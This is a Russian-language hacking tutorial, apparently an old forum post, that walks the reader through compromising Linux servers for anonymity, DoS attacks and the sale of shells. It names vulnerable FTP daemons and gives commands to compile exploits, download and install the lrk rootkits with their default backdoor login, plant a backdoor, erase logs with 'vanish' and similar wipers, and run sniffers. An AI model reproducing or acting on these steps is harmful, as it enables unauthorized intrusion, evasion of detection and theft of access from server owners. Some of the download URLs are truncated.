В этой статье я хочу описать некоторые приёмы взлома unix (больше linux) серверов, т.е. получение на нём максимальных привилегий. Для чего это нужно? Ок. Сравнени юних-shellа у тебя на компе и юникс-шелла на удалённом серваке. (Беру как частый случай).
1. Анонимность. Во всех взломах с N сервера, обвинят N сервер, а не тебя. Можно сканнировать хосты, отсылать письма - анонимно.
2. Скорость. Результаты сканнирования (будь то использование CGI сканнера, или порт-сканнера) возвращаются гораздо быстрее, чем на диал-ап доступ (а я уверен, что в России юзеры процентов на 85 сидит на диал-ап линии,.на удалённом сервере же, скорее всего, установлен адаптор ISDN или T1, если повезёт Т3. За счёт скорости шелла и кол-ва их же, можно устраивать нехилые DoS атаки на другие сервера.
3. Деньги. Хороший шелл можно загнать за неплохие деньги. Например на канале #cc #shells (dalnet), правда стоит опастаться Ripper'ов (кидал).
4. Ещё много всего, например установка ботов для IRC.
Part II. Приступим.
Для начала надо найти жертву. Но как? По каким параметрам?...
Телнетом:
ftpдемоны (21 порт) - wu-ftpd: 2.6.0, wu-2.4, wu-2.4.2 [Beta 12-18], ProFTPd 1.2.0 pre(0-3), obsd 1.3, Serv-U 2.5 и множество других, наиболее полный список можно посмотреть на wwwussrback.com - там же и эксплойты к ним.
Итак, что же делать дальше? Для большинства эксплойтов нужна система unix (Linux, FreeBSD, Solaris, OpenBSD, NetBSD, BSD/OS и т.д.). Компилим исходник эксплойта коммандой:
gcc -o kewl-xploit xploit.c
(где xploit.c исходник эксплойта, а kewl-xploit название бинарного файла).
Далее всё просто, следуем инструкции эксплойта. Если всё пройдёт успешно, то вы должны увидеть примерно следуещее:
Linux Red Hat 7 Release uid=0(root) gid=0(root) groups=0(root) #/bin/bash
[size=18]Сервер ваш, с правами = 0:0, юзера root.
[size=18]Part III. Подготовка, использование.
Далее надо забэкдорить систему. For what? Для того, чтобы не входить в систему через шумный эксплойт. А спокойно и тихо войти через телнет (ественно вы не будете светиться при этом, дальше написанно как. Опишу эти методы для linux'а.
1. Для начала надо залить туда руткит. Руткит - троянит (модифицирует) программы. ls - прячет твою директорию, passwd - не показывает твой аккаунт в файле логинов, паролей, ps - прячет n'ый процесс, и ещё много других программ подвергаются переделке под вас.
Создаём папку для руткита: rootkit или " ." (на некоторых системах её невидно), желательно создавать в папке /tmp корневой директории. Залезаем в папку (cd rootkit). Заливаем руткит коммандой http://packetstorm.securify.com/UNIX/pe … src.tar.gz > rootkit.tar.gz
Далее распаковываем коммандой tar zxvf rootkit.tar.gz Залезаем в образованную после распаковки директорию. Устанавливаем make install. Далее настройте руткит. В readme файле всё написанно. После настройки logout. Т.е. выход.
2. Вход. После установки и настройки rootkit'a lrk4 или lrk5 входим через обычный телнет или ssh в систему с логином rewt и паролем satori. А что делать если сервер-телнета (23 порт) не открыт? Для этого после установки и настройки руткита надо залить туда какой-нибудь бэкдор (например BO для unix). И лазить через него.
3. Стираем логи. Логи хронят в себе Это надо делать обязательно, если вы не хотите, чтобы на следующие дни после получения шелла вы получили срок. Скачивайте например:
http://packetstorm.securify.com/UNIX/pe … marryv11.c - очень хороший лог вайпер.
http://packetstorm.securify.com/UNIX/pe … anish2.tgz - тоже хороший, самый популярный =) Распаковывайте, компилируйте и отдавайте строку вида:
./vanish root www.fucked_server.com your_ip
Part IV. Что дальше? Некоторые советы.
Что можно сделать дальше. Ну например залить и установить туда nmap и какой-нибудь сканнер CGI скриптов (может выложу свой сканнер на Perl). Копировать файлы на шелл можно локально и ремоутно (с серваков) например:
http://www.nerf.f2s.com/index.html > index.html - скопируется в директорию, где вы находитесь...
Можно поставить сниффер и попробовать послушать всю сетку..
Ну и напоследок несколько советов: Соблюдайте полную анонимность на том сервере. Не стирайте, и не (тем паче) не дефейсте файлы на серваке. Кому станет лучше если вы вставите в /etc/passwd строку "leet' h4x0rz wuz h3r3" ?....
Ещё хочу заметить, что это только описан метод получения шелла системы linux, но!..для многих других систем (FreeBSD, OpenBSD, NetBSD,BSD/OS, SunOS, Solaris....и др.) методика остаётся похожей, и дело меняет только эксплойты и руткиты. See ya![/size][/size]